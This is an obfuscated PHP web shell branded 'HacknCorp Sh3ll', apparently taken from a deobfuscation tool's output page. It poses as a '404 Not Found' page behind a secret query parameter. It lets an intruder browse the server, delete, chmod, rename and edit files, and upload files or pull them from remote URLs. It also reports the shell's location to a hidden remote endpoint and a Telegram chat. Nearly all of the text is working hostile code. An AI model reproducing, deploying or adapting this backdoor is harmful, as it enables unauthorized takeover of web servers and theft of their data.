CURLOPT_RETURNTRANSFER, true); goto vW1dr; RAo6y: function green($text) { echo "\x3c\143\x65\156\x74\145\x72\76\74\x66\x6f\156\164\40\x63\x6f\x6c\157\162\75\47\x67\162\x65\x65\156\47\76" . $text . "\x3c\57\x63\145\x6e\164\145\162\76\74\57\146\x6f\156\x74\x3e"; } goto E512M; e2taD: curl_close($ch); goto zsxJG; XT8PO: $chat_id = "\x36\66\71\60\x30\x32\64\x30\x30\x32"; goto YHl89; qZITq: $lokasis = explode("\57", $lokasi); goto P1BQi; tA2Sz: echo "\x55\x73\145\162\40\x3a\40\74\146\157\156\164\40\x63\x6f\154\157\162\x3d\47\x67\x6f\154\144\47\x3e" . @get_current_user() . "\46\x6e\x62\x73\160\73\74\57\146\x6f\156\164\76\50\40\x3c\146\157\156\x74\40\x63\x6f\x6c\157\162\x3d\x27\x67\x6f\154\144\47\76" . @getmyuid() . "\x3c\x2f\x66\x6f\156\164\76\51\x3c\x62\x72\x3e"; goto GWlLw; rEkVW: echo "\x3c\146\157\x72\155\x20\x65\x6e\143\x74\x79\x70\145\x3d\x22\155\x75\154\x74\151\160\141\x72\164\57\x66\157\x72\155\x2d\x64\141\x74\141\42\x20\x6d\145\164\150\x6f\x64\75\x22\x70\x6f\x73\164\42\76\12\x3c\x69\x6e\x70\165\x74\40\x74\171\160\145\x3d\42\x72\x61\144\x69\157\42\x20\166\141\154\165\x65\75\x22\x31\42\x20\x6e\141\155\x65\x3d\x22\x64\x69\x72\156\x79\141\x22\x20\143\150\145\x63\x6b\145\144\76\x63\165\x72\x72\x65\156\x74\x5f\144\x69\162\40\133\x20" . cekdir() . "\40\x5d\12\x3c\151\156\x70\x75\x74\x20\x74\x79\x70\x65\x3d\42\x72\x61\144\x69\x6f\x22\40\166\x61\154\x75\145\x3d\x22\x32\42\x20\156\141\x6d\145\x3d\x22\x64\151\x72\156\171\x61\42\40\x3e\x64\157\x63\165\155\145\x6e\x74\x5f\x72\157\157\x74\x20\133\40" . cekroot() . "\40\135\xa\74\142\162\x3e\12\x3c\151\156\160\165\x74\x20\x74\x79\x70\145\75\42\x68\x69\x64\144\x65\x6e\42\40\156\141\155\145\x3d\x22\165\160\x77\x6b\167\x6b\42\x20\166\x61\x6c\x75\145\x3d\42\x61\160\x6c\x6f\144\x22\x3e\12\74\151\x6e\x70\x75\164\x20\x74\171\x70\x65\x3d\42\x66\x69\x6c\145\x22\40\156\141\155\145\75\x22\142\145\x72\153\x61\x73\x22\76\x3c\x69\x6e\x70\165\164\x20\164\x79\x70\x65\x3d\x22\163\x75\142\155\151\164\42\x20\156\x61\155\x65\75\42\x62\x65\x72\x6b\141\163\156\x79\x61\x22\x20\166\x61\154\165\145\75\x22\x55\160\154\x6f\x61\x64\x22\x20\143\154\x61\x73\x73\75\x22\165\160\x22\x20\163\164\171\154\x65\75\x22\143\165\162\163\157\162\72\x20\160\x6f\x69\x6e\x74\145\x72\73\40\142\x6f\x72\144\145\x72\x2d\143\157\154\x6f\162\72\40\x23\x66\146\x66\42\76\x3c\x62\162\x3e\12\x3c\x69\156\160\165\164\x20\x74\171\x70\145\x3d\x22\164\x65\x78\x74\42\40\x6e\141\155\145\x3d\x22\x64\141\162\x69\x6c\151\x6e\x6b\42\x20\x63\154\141\163\x73\75\42\165\x70\x22\x20\x70\154\141\143\x65\x68\157\x6c\144\145\162\75\x22\114\x69\156\x6b\x20\x46\151\154\145\42\x3e\x26\156\x62\x73\160\73\x3c\151\156\x70\x75\x74\40\x74\x79\x70\145\75\x22\164\145\x78\x74\x22\40\156\x61\x6d\145\x3d\x22\x6e\x61\x6d\141\x6c\151\156\153\42\40\x63\x6c\x61\x73\x73\x3d\x22\165\160\42\x20\x73\151\x7a\145\75\x22\x35\42\40\x70\x6c\x61\143\x65\x68\x6f\x6c\x64\x65\162\x3d\42\x66\151\154\145\x2e\x74\x78\x74\x22\x3e\74\x69\156\160\165\164\x20\164\171\x70\145\75\42\x73\165\x62\x6d\151\164\42\x20\156\x61\x6d\x65\75\42\x6c\151\x6e\153\156\x79\x61\x22\40\143\x6c\x61\163\163\x3d\42\165\160\42\x20\166\x61\x6c\x75\145\x3d\x22\x55\160\x6c\x6f\x61\144\42\40\163\164\x79\154\145\75\42\x63\165\162\x73\x6f\162\x3a\x20\x70\x6f\x69\156\164\x65\162\x3b\40\x62\157\162\144\145\162\55\143\157\x6c\x6f\x72\x3a\40\43\146\x66\146\x22\76\xa\74\57\143\145\156\x74\145\162\x3e\12\74\57\x66\157\x72\x6d\76"; goto YNYgP; NH5FV: if (empty($disfunc)) { $disf = "\x3c\146\157\156\164\40\143\157\x6c\157\162\75\x27\147\x72\x65\x65\156\x27\x3e\x4e\117\x4e\x45\x3c\57\x66\157\156\x74\76"; } else { $disf = "\74\146\x6f\x6e\x74\x20\x63\157\154\x6f\x72\75\47\x72\145\x64\x27\x3e" . $disfunc . "\74\x2f\146\157\x6e\164\x3e"; } goto G2mx6; jljvt: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto lJ15O; NPAyC: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto pGJ25; pGJ25: $k3yw = base64_decode("\x41\x63\x4c\123\x46\x4e\x69\166\107\130\x6f\65\x44\x6e\x6f\x50\161\x41\x64\126\170\x48\102\x37\161\121\x72\x55\166\x78\x6a\x67\x58\170\155\x72\x47\150\x45\x46\x48\x36\166\64"); goto ldTow; ViaUA: $options = array("\150\x74\164\160" => array("\155\145\164\150\157\x64" => "\x50\x4f\x53\124", "\150\x65\141\x64\145\162" => "\x43\x6f\156\x74\145\156\164\x2d\164\171\160\145\72\40\x61\x70\160\x6c\x69\143\141\x74\x69\x6f\156\57\170\55\167\167\167\55\x66\157\x72\x6d\x2d\x75\x72\x6c\x65\x6e\143\157\x64\x65\144", "\143\157\x6e\164\145\x6e\164" => http_build_query($data))); goto d5DyB; PmxvI: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\57{$file}")) { continue; } $size = filesize("{$lokasi}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\115\x42"; } else { $size = $size . "\x20\x4b\102"; } echo "\x3c\164\162\76\12\74\164\x64\x3e\74\141\x20\x68\162\145\x66\75\x22\x3f\110\x43\x26\x66\151\154\x65\x6c\x6f\143\x3d{$lokasi}\x2f{$file}\x26\160\141\164\x68\75{$lokasi}\42\76{$file}\x3c\57\x61\76\x3c\x2f\x74\x64\76\xa\74\164\144\x3e\x3c\143\145\x6e\164\x65\x72\76" . $size . "\74\x2f\143\x65\x6e\164\145\162\x3e\x3c\57\x74\144\x3e\xa\74\164\x64\76\x3c\143\145\x6e\x74\145\x72\76"; if (is_writable("{$lokasi}\57{$file}")) { echo "\x3c\146\x6f\x6e\164\x20\x63\x6f\154\x6f\162\75\42\147\x72\x65\x65\x6e\x22\x3e"; } elseif (!is_readable("{$lokasi}\x2f{$file}")) { echo "\x3c\146\157\x6e\x74\40\x63\157\x6c\157\162\75\42\x72\145\x64\42\x3e"; } echo statusnya("{$lokasi}\57{$file}"); if (is_writable("{$lokasi}\57{$file}") || !is_readable("{$lokasi}\x2f{$file}")) { echo "\74\x2f\146\x6f\x6e\x74\76"; } echo "\x3c\x2f\x63\x65\x6e\164\145\162\76\x3c\57\x74\x64\x3e\74\x74\144\x3e\x3c\x63\x65\x6e\164\145\162\x3e\xa\x3c\x66\x6f\x72\155\40\x6d\x65\164\150\157\144\x3d\42\x70\157\163\x74\42\x20\141\x63\164\151\x6f\156\x3d\42\x3f\x48\x43\x26\x70\x69\x6c\x69\150\141\x6e\x26\x70\141\x74\x68\x3d{$lokasi}\42\76\xa\x3c\x73\145\154\145\143\x74\x20\x6e\x61\155\145\75\42\x70\x69\x6c\151\150\x22\76\12\74\x6f\x70\x74\151\157\156\40\x76\141\x6c\165\x65\75\42\x22\76\74\x2f\x6f\x70\x74\151\157\x6e\76\12\74\157\x70\x74\x69\x6f\156\x20\x76\x61\x6c\165\x65\75\x22\150\141\x70\165\163\x22\76\104\145\x6c\x65\164\x65\74\x2f\x6f\160\164\x69\157\x6e\x3e\12\x3c\157\160\x74\x69\x6f\x6e\40\x76\x61\154\x75\145\75\x22\x75\x62\x61\x68\x6d\x6f\x64\42\x3e\103\x68\x6d\60\x64\74\x2f\x6f\160\164\151\x6f\x6e\76\xa\74\x6f\x70\164\151\x6f\156\40\166\x61\154\165\145\x3d\42\x67\141\x6e\164\x69\x6e\141\x6d\141\42\x3e\x52\145\x6e\141\x6d\x65\74\x2f\x6f\160\164\151\157\156\x3e\12\x3c\x6f\160\164\151\x6f\156\40\x76\x61\154\x75\x65\75\x22\145\144\151\164\x22\x3e\105\x64\x69\x74\74\57\x6f\x70\x74\x69\157\156\76\xa\74\57\163\145\154\x65\x63\164\x3e\12\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\x3d\42\x68\x69\144\144\145\156\42\40\x6e\x61\x6d\x65\75\x22\x74\x79\160\145\42\x20\166\x61\154\165\145\75\x22\x66\x69\x6c\x65\42\x3e\12\x3c\151\x6e\x70\x75\x74\x20\x74\171\160\x65\x3d\x22\x68\x69\x64\144\145\156\42\x20\x6e\x61\155\x65\75\42\x6e\141\155\145\x22\40\166\x61\x6c\x75\145\75\42{$file}\42\x3e\12\74\151\x6e\x70\x75\164\x20\x74\171\x70\x65\x3d\x22\x68\151\144\144\145\156\42\40\x6e\141\155\145\x3d\x22\x70\141\164\x68\x22\x20\166\x61\154\165\145\x3d\x22{$lokasi}\57{$file}\x22\76\xa\x3c\151\x6e\x70\165\164\x20\x74\171\x70\145\75\x22\163\165\142\155\151\x74\x22\40\143\x6c\141\x73\x73\x3d\x22\147\141\163\x22\x20\166\141\x6c\165\x65\x3d\42\76\42\x20\x2f\x3e\12\74\x2f\x63\x65\156\x74\145\x72\76\74\x2f\146\x6f\162\155\76\x3c\x2f\x74\144\x3e\xa\74\x2f\x74\x72\x3e"; } goto dDz_T; hp7BU: $disfunc = @ini_get("\x64\151\163\x61\x62\x6c\145\x5f\x66\x75\156\143\x74\151\x6f\156\163"); goto NH5FV; NuE1V: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "\x3c\x61\x20\150\162\145\146\x3d\x22\x3f\x48\x43\x26\x70\x61\164\150\x3d\57\42\76\x2f\x3c\57\x61\76"; continue; } if ($lok == '') { continue; } echo "\74\x61\x20\x68\x72\x65\146\75\x22\77\110\103\46\x70\x61\x74\x68\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "\57"; } } echo "\42\x3e" . $lok . "\x3c\57\x61\x3e\57"; } goto kKC9M; YmBML: echo "\74\x74\x72\x20\143\154\141\x73\x73\75\x22\146\151\162\163\164\x22\76\x3c\164\x64\76\74\x2f\x74\x64\x3e\74\x74\144\76\74\x2f\x74\144\x3e\x3c\164\x64\x3e\74\57\x74\144\76\x3c\x74\x64\x3e\74\x2f\164\x64\76\x3c\57\x74\162\76"; goto PmxvI; KcSnS: echo "\125\x70\x6c\x6f\141\144\x20\x46\x69\x6c\x65\x20\x3a\40"; goto rEkVW; k4ptV: set_time_limit(0); goto cZO8A; t8XjL: $result = file_get_contents($k3yw, false, $context); goto NuE1V; NJqIB: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "\x2f" . $dir) || $dir == "\x2e" || $dir == "\x2e\56") { continue; } echo "\x3c\x74\162\x3e\xa\11\74\164\144\76\x3c\x61\x20\x68\162\145\146\75\42\x3f\110\103\46\160\141\164\x68\x3d" . $lokasi . "\x2f" . $dir . "\42\76" . $dir . "\74\x2f\141\x3e\74\57\164\x64\76\12\11\x3c\164\144\76\x3c\143\145\156\x74\145\x72\x3e\55\x2d\x3c\x2f\x63\x65\x6e\164\145\x72\x3e\x3c\x2f\x74\144\76\12\x9\x3c\x74\x64\76\x3c\x63\145\x6e\x74\x65\x72\76"; if (is_writable($lokasi . "\x2f" . $dir)) { echo "\x3c\146\157\x6e\x74\x20\x63\x6f\x6c\x6f\162\x3d\42\x67\x72\x65\145\x6e\x22\76"; } elseif (!is_readable($lokasi . "\x2f" . $dir)) { echo "\74\146\157\x6e\x74\x20\x63\x6f\x6c\x6f\x72\75\42\162\145\x64\42\76"; } echo statusnya($lokasi . "\x2f" . $dir); if (is_writable($lokasi . "\x2f" . $dir) || !is_readable($lokasi . "\x2f" . $dir)) { echo "\x3c\x2f\146\x6f\156\x74\76"; } echo "\x3c\57\x63\145\x6e\x74\x65\x72\76\74\57\164\144\76\xa\11\x3c\164\x64\x3e\74\x63\x65\156\x74\145\162\x3e\x3c\146\x6f\162\155\x20\155\x65\164\x68\x6f\x64\75\42\120\117\123\124\x22\40\141\143\164\151\x6f\x6e\75\42\77\110\103\46\x70\x69\154\x69\150\141\x6e\x26\160\x61\x74\x68\x3d{$lokasi}\x22\x3e\12\11\x3c\163\145\x6c\145\x63\164\x20\x6e\141\155\x65\75\x22\160\151\154\x69\x68\x22\76\xa\x9\74\157\160\164\151\157\156\40\x76\141\x6c\165\x65\75\42\x22\76\x3c\x2f\x6f\160\x74\x69\x6f\x6e\76\xa\x9\x3c\x6f\x70\x74\151\157\x6e\40\166\141\154\x75\145\x3d\42\150\x61\x70\165\x73\x22\76\x44\x65\x6c\145\x74\145\74\x2f\x6f\x70\164\x69\157\156\x3e\12\x9\x3c\157\160\x74\151\157\x6e\40\166\x61\154\165\145\75\x22\165\x62\141\150\155\157\144\x22\x3e\x43\x68\x6d\x30\144\x3c\x2f\157\x70\x74\151\x6f\x6e\76\12\x9\74\157\x70\164\x69\157\x6e\x20\166\x61\154\165\x65\75\42\147\141\156\x74\x69\156\x61\x6d\141\x22\x3e\x52\x65\156\141\x6d\145\74\x2f\x6f\x70\164\x69\157\x6e\76\12\x9\x3c\x2f\163\x65\154\145\x63\x74\76\12\11\74\x69\156\x70\165\x74\x20\x74\171\160\145\x3d\x22\x68\151\144\144\145\x6e\x22\x20\x6e\x61\155\x65\75\42\x74\171\160\x65\42\40\x76\x61\x6c\165\145\x3d\42\144\151\162\42\76\12\11\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\x22\x68\151\144\144\x65\156\x22\40\x6e\x61\155\x65\75\42\156\x61\x6d\x65\42\x20\166\x61\154\165\x65\75\x22{$dir}\x22\x3e\xa\x9\x3c\151\x6e\x70\x75\x74\x20\164\x79\160\x65\75\42\x68\151\x64\144\145\156\x22\x20\156\141\155\x65\75\x22\x70\141\164\150\42\40\x76\141\x6c\x75\x65\75\x22{$lokasi}\x2f{$dir}\x22\x3e\12\x9\x3c\x69\x6e\160\x75\x74\40\164\x79\x70\145\x3d\42\163\165\x62\155\151\164\x22\x20\143\154\x61\x73\163\75\x22\x67\141\x73\42\40\x76\x61\154\x75\x65\x3d\42\x3e\42\40\57\x3e\xa\11\x3c\57\146\157\162\x6d\x3e\x3c\57\x63\145\x6e\164\x65\x72\76\74\x2f\164\x64\x3e\xa\11\74\x2f\x74\x72\x3e"; } goto YmBML; KZWcc: if (isset($_POST["\x75\x70\x77\153\167\153"])) { if (isset($_POST["\x62\145\x72\x6b\x61\163\x6e\171\141"])) { if ($_POST["\x64\x69\x72\x6e\171\x61"] == "\x32") { $lokasi = $_SERVER["\104\x4f\103\x55\115\x45\116\124\x5f\x52\x4f\117\x54"]; } $data = @file_put_contents($lokasi . "\x2f" . $_FILES["\x62\145\x72\153\x61\x73"]["\x6e\x61\155\x65"], @file_get_contents($_FILES["\142\145\162\153\x61\163"]["\x74\155\160\x5f\156\x61\x6d\145"])); if (file_exists($lokasi . "\x2f" . $_FILES["\142\x65\x72\x6b\x61\x73"]["\156\141\x6d\x65"])) { echo "\x46\151\x6c\145\40\125\160\x6c\x6f\141\x64\x65\x64\40\x21\40\46\156\x62\x73\160\73\x3c\x66\x6f\156\164\x20\x63\157\154\x6f\x72\x3d\47\147\162\145\x65\x6e\47\76\x3c\151\76" . $lokasi . "\x2f" . $_FILES["\x62\145\162\x6b\141\163"]["\x6e\141\155\x65"] . "\74\x2f\151\76\x3c\57\146\x6f\x6e\x74\76\x3c\142\162\x3e\x3c\x62\x72\x3e"; } else { echo "\74\x66\x6f\156\164\x20\x63\157\154\x6f\x72\75\47\162\x65\x64\x27\x3e\x46\x61\x69\x6c\145\144\x20\x74\157\x20\x55\x70\154\x6f\x61\144\x20\41\x3c\142\x72\76\x3c\142\x72\x3e"; } } elseif (isset($_POST["\x6c\x69\x6e\153\156\171\x61"])) { if (empty($_POST["\156\x61\155\x61\154\151\156\x6b"])) { die("\106\151\154\145\x6e\141\155\145\x20\143\x61\156\x6e\x6f\x74\40\x62\145\x20\x65\155\x70\164\x79\x20\41"); } if ($_POST["\144\x69\162\156\x79\141"] == "\62") { $lokasi = $_SERVER["\x44\x4f\x43\x55\x4d\105\116\x54\137\122\117\x4f\124"]; } $data = @file_put_contents($lokasi . "\x2f" . $_POST["\156\x61\x6d\x61\154\151\156\x6b"], @file_get_contents($_POST["\x64\x61\162\151\154\x69\x6e\x6b"])); if (file_exists($lokasi . "\57" . $_POST["\x6e\x61\x6d\141\x6c\151\x6e\x6b"])) { echo "\106\x69\154\145\x20\125\x70\x6c\157\141\144\x65\x64\40\41\x20\x26\x6e\x62\163\160\73\x3c\x66\157\156\x74\x20\143\x6f\x6c\x6f\162\75\47\147\162\145\x65\x6e\x27\x3e\x3c\x69\76" . $lokasi . "\57" . $_POST["\x6e\x61\x6d\141\154\151\156\x6b"] . "\74\57\151\x3e\x3c\x2f\x66\x6f\x6e\164\x3e\x3c\x62\162\x3e\74\x62\162\x3e"; } else { echo "\x3c\x66\x6f\156\164\40\x63\x6f\x6c\x6f\x65\75\x27\162\145\x64\x27\x3e\x46\141\x69\154\x65\144\x20\164\157\40\125\x70\154\157\x61\x64\x20\41\74\x62\x72\x3e\74\x62\162\76"; } } } goto K9E06; vW1dr: $result = curl_exec($ch); goto e2taD; hJvae: function cekdir() { if (isset($_GET["\160\141\x74\x68"])) { $lokasi = $_GET["\x70\x61\x74\150"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "\x3c\146\157\x6e\164\x20\143\157\x6c\157\162\x3d\x27\x72\145\141\x64\47\76\127\x72\x69\164\x65\x61\142\154\x65\x3c\x2f\146\157\x6e\164\x3e"; } else { return "\x3c\x66\157\x6e\x74\40\143\x6f\154\157\x72\x3d\x27\x72\x65\x64\x27\x3e\x57\x72\x69\x74\x65\x61\x62\154\x65\x3c\57\146\x6f\156\x74\x3e"; } } goto ZFBR1; oLHYv: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "\163"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "\x6c"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "\x2d"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "\142"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "\144"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "\x63"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "\160"; } else { $ingfo = "\165"; } $ingfo .= $statusnya & 256 ? "\162" : "\x2d"; $ingfo .= $statusnya & 128 ? "\x77" : "\x2d"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "\x73" : "\x78" : ($statusnya & 2048 ? "\123" : "\55"); $ingfo .= $statusnya & 32 ? "\162" : "\55"; $ingfo .= $statusnya & 16 ? "\167" : "\55"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "\163" : "\x78" : ($statusnya & 1024 ? "\123" : "\x2d"); $ingfo .= $statusnya & 4 ? "\162" : "\x2d"; $ingfo .= $statusnya & 2 ? "\x77" : "\x2d"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "\164" : "\x78" : ($statusnya & 512 ? "\124" : "\x2d"); return $ingfo; } goto Y1WfK; FlswY: $ch = curl_init($apiUrl); goto BefUn; zsxJG: if ($result) { $response = json_decode($result, true); if ($response["\x6f\x6b"]) { echo "\120\145\163\141\156\40\142\145\162\150\x61\163\151\154\40\144\x69\153\x69\162\151\x6d\x21"; } else { echo "\x45\162\162\x6f\162\72\x20" . $response["\x64\x65\x73\143\162\151\160\164\151\x6f\x6e"]; } } else { echo "\107\x61\147\x61\x6c\40\x6d\x65\x6e\x67\151\162\151\155\x20\x70\145\162\155\x69\x6e\x74\x61\x61\x6e\40\153\145\40\x41\x50\111\40\124\x65\x6c\x65\x67\162\x61\x6d\x2e"; } goto k4ptV; xybUr: ?>

<!DOCTYPE html>

<html>
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<head>
	<title>404 Not Found</title>
</head>
<style type="text/css">
body {
  overflow-x:hidden;
  font: 15px "Century Gothic", "Times Roman", sans-serif;
  background:url();
background-image: url(https://kosred.com/a/gqpoj.jpg);
  background-size: cover;
  background-repeat: no-repeat;
  background-position: center;
  background-attachment: fixed;
  height: 100%;
  color: white;
  }
  


</style>
<link href="" rel="stylesheet" type="text/css">
<style>
	@import url('https://fonts.googleapis.com/css?family=Dosis');
	@import url('https://fonts.googleapis.com/css?family=Bungee');
body {
	font-family: "Lime", cursive;
	text-shadow:1px 3px 50px #ffffff;
}

#content tr:hover {
	background-color: #05a181;
	text-shadow:0px 0px 0px ;
}

#content .first {
	background-color: #05a181;
}

#content .first:hover {
	background-color: #ff0303
	text-shadow:0px 0px 1px #05a181;
}

table {
	border: 0px #ffffff dotted;
	table-layout: fixed;
}

td {
	word-wrap: break-word;
}

a {
	color: #ffffff;
	text-decoration: none;
}

a:hover {
	color: #000000;
	text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
	border: 1px #05a181 solid;
	-moz-border-radius: 5px;
	-webkit-border-radius:5px;
	border-radius:5px;
}

.gas {
	background-color: #1f1f1f;
	color: #ffffff;
	cursor: pointer;
}

select {
	background-color: transparent;
	color: #ffffff;
}

select:after {
	cursor: pointer;
}

.linka {
	background-color: transparent;
	color: #ffffff;
}

.up {
	background-color: transparent;
	color: #fff;
}

option {
	background-color: #000300;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<center>
<font face="Bungee" size="6">&#128321; HacknCorp Sh3ll &#128321;</font></center>
<table width="900" border="0" cellpadding="2" cellspacing="1" align="center">
<tr><td>
<center>
<title="T3RS4K1T1" alt="OdayForums" class="center" />
</marquee>
            <hr>
        </font>
        <audio src="https://kosred.com/a/etapcc.mp3" autoplay="true" id="song" loop=""></audio>
<br><br><br>
<?php  goto xHNKz; BefUn: curl_setopt($ch, CURLOPT_POST, 1); goto jljvt; cZO8A: error_reporting(0); goto hp7BU; P1BQi: $lokasinya = @scandir($lokasi); goto BWT7a; CJbAV: $data = array("\x66\151\154\145\137\x75\162\x6c" => $cur); goto ViaUA; MrADl: $lokasi = str_replace("\134", "\57", $lokasi); goto qZITq; Su0Ej: $data = array("\143\x68\141\x74\x5f\x69\x64" => $chat_id, "\x74\145\x78\x74" => $message, "\x70\x61\162\163\x65\x5f\155\x6f\144\145" => "\115\141\x72\x6b\144\x6f\167\x6e"); goto FlswY; E512M: function red($text) { echo "\74\x63\x65\156\x74\x65\162\76\74\x66\x6f\156\164\40\143\x6f\154\157\162\x3d\x27\162\145\144\47\76" . $text . "\x3c\x2f\x63\x65\x6e\x74\x65\162\76\74\x2f\146\157\x6e\164\76"; } goto yLOQx; yLOQx: echo "\x53\x65\162\166\x65\x72\40\72\x20\x3c\x66\157\156\164\40\x63\157\x6c\157\x72\75\47\x67\157\x6c\144\x27\x3e" . $_SERVER["\x53\105\x52\x56\x45\122\x5f\x53\x4f\106\124\x57\x41\x52\105"] . "\74\57\146\157\x6e\x74\76\x3c\142\x72\x3e"; goto B4fiv; dDz_T: echo "\x3c\x2f\x74\162\76\74\x2f\x74\144\x3e\x3c\x2f\x74\141\142\154\x65\76\x3c\x2f\x74\141\142\154\145\x3e"; goto eJk0A; d5DyB: $context = stream_context_create($options); goto t8XjL; uOnWj: if (!isset($_GET["\110\103"])) { die; } goto xybUr; eJk0A: author(); goto oLHYv; Y1WfK: 

Function Calls

None

Variables

None

Stats

MD5 4e581be3444c1ffbcbb278b2cd75c212
Eval Count 0
Decode Time 134 ms